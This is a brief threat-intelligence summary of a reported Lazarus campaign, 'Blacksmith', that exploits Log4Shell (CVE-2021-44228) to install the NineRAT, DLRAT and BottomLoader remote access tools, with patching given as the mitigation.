Cisco Talos reports an active campaign, dubbed "Blacksmith," which has been attributed to the DPRK-nexus Lazarus. The actor has been exploiting the infamous CVE-2021-44228, more commonly referred to as "Log4j" or "Log4Shell," to deploy various strains of remote access trojans (RATs).
Available intelligence indicates that reconnaissance efforts have reportedly been carried out by a sub-unit of Lazarus known as "Andariel" or "Silent Chollima." This unit has historically been tasked with identifying targets that may be exploited in long-term espionage campaigns.
The exploitation involves the installation of the following RATs:
NineRAT, which leverages Telegram for command-and-control (C2).
DLRAT, a sophisticated backdoor with the capability to operate as a downloader, communicate with the C2, and perform expanded post-exploitation reconnaissance.
BottomLoader, a downloader that serves the purpose of downloading a post-exploitation tool - HazyLoad. The latter was observed in the DPRK-attributed exploitation of CVE-2023-42793, a remote-code execution vulnerability affecting multiple versions of JetBrains TeamCity server.
Mitigation strategies include patching CVE-2021-44228, which impacts Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1).
A cursory search for "log4j2" via open-source scanners reveals numerous instances matching these search parameters but provides no conclusive data regarding exploitability against such instances or the accuracy of such data.